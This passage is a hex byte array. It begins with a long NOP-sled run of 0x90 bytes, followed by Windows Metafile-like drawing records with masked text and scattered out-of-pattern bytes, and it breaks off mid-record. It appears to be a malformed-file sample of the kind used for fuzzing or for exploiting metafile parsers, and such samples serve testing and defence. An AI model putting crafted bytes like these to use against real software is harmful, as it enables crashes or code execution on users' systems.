0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x00, - 0x09, 0x00, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, - 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 
0x01, 0x18, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA5, 0x01, - 0x2A, 0x00, 0x09, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00, - 0x0A, 0xFB, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x09, 0x00, 0x07, 0x00, 0x09, 0x00, - 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x8A, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x70, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0x2A, 0x00, - 0x0C, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0C, 0x00, - 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0xBB, 0x01, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, - 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, - 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x01, 0x00, 0x25, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0xA9, 0x00, 0x14, 0x00, 0x00, 0x00, - 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x77, 0x77, 0x20, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, - 0x06, 0x00, 0x0A, 
0x00, 0x08, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, - 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, - 0x04, 0xBE, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, - 0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xD1, 0x01, 0x2A, 0x00, 0x24, 0x00, 0x00, 0x00, 0x49, 0x20, - 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x42, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, - 0x42, 0x20, 0x07, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x09, 0x00, - 0x05, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, - 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, - 0x06, 0x00, 0x04, 0x00, 0x0E, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, - 0x0A, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x2A, 0x00, 0x01, 0x00, 0x00, 0x00, 0x49, 0x00, 0x07, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, - 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, - 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x9F, - 0x0A, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 
0x0A, 0xE8, 0x01, 0x31, 0x00, 0x01, 0x00, - 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0xB0, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, - 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x30, 0x00, 0x00, 0x00, 0x32, 0x0A, - 0xE8, 0x01, 0x37, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x77, 0x20, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, - 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, - 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x04, 0x00, 0x0C, 0x00, - 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x32, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x24, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0x2A, 0x00, 0x13, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00, - 0x07, 0x22, 0x0D, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, - 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0xE9, - 0x0A, 0x00, 0x06, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x7E, 0x01, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xE5, 0xFF, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 
0x69, - 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, - 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00, - 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, - 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0xBE, 0x00, 0x09, 0x00, - 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0D, 0x00, 0x0F, 0x00, - 0x0E, 0x00, 0x0E, 0x00, 0x09, 0x00, 0x0D, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, - 0x00, 0x00, 0xFB, 0x02, 0xED, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, - 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, - 0x08, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0x06, 0x02, 0x2D, 0x01, 0x08, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x20, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, - 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0x2A, 0x00, - 0x05, 0x00, 0x00, 0x00, 0x77, 
0x77, 0x77, 0x20, 0x3D, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, - 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x83, - 0x59, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, - 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC3, 0x18, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x57, 0x01, 0x00, 0x18, 0x00, 0x00, 0xF2, 0x32, 0x0A, 0x1E, 0x02, - 0x60, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x08, 0x00, 0x05, 0x00, 0x09, 0x00, - 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0x1E, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, - 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, - 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0xCD, 0x0A, 0x1E, 0x02, 0xBE, 0x00, 0x06, 0x00, 0x00, 0x00, - 0x31, 0x20, 0x77, 0x77, 0x77, 0x77, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x06, 0x00, - 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 
0x0A, 0x1E, 0x02, 0xEF, 0x00, - 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, - 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00, 0x00, 0x00, - 0x32, 0x0A, 0x1E, 0x02, 0xF4, 0x00, 0x12, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x08, 0x00, 0x0A, 0x00, - 0x0A, 0x00, 0x09, 0x00, 0x09, 0x00, 0x08, 0x00, 0x06, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, - 0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0F, 0x00, 0x09, 0x00, 0x05, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, - 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, - 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x02, 0x01, 0x01, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x2A, 0x00, 0x0D, 0x00, - 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, - 0x07, 0x00, 0x0F, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, - 0x08, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x87, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x95, 0x00, 0x01, 0x00, 0x00, 0xE0, 0x2D, 0x00, 0x06, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x9F, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, - 0x05, 
0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, - 0x00, 0x00, 0x00, 0x00, 0x04, 0xC6, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x02, 0x01, 0x01, 0x00, 0x24, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x9B, 0x00, 0x13, 0x00, - 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, - 0x77, 0x77, 0x77, 0x77, 0x20, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x04, 0x00, - 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, - 0x09, 0x00, 0x09, 0x00, 0x06, 0x00, 0xB8, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, - 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x2A, 0x00, 0x07, 0x00, 0x00, 0x00, 0x4A, 0x4E, - 0x4B, 0x20, 0x3D, 0x20, 0x63, 0x00, 0x0A, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0A, 0x00, - 0x05, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, - 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, - 0x6D, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, - 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, - 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, - 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x72, 
0x00, 0x05, 0x00, 0x00, 0x00, 0x4A, 0x75, 0x6E, 0x20, - 0x4E, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00, - 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, - 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x95, 0x00, 0x00, 0x00, 0x00, - 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, - 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE8, 0x00, - 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, - 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, - 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, - 0x00, 0x00, 0x02, 0x01, 0x7C, 0x00, 0x13, 0x00, 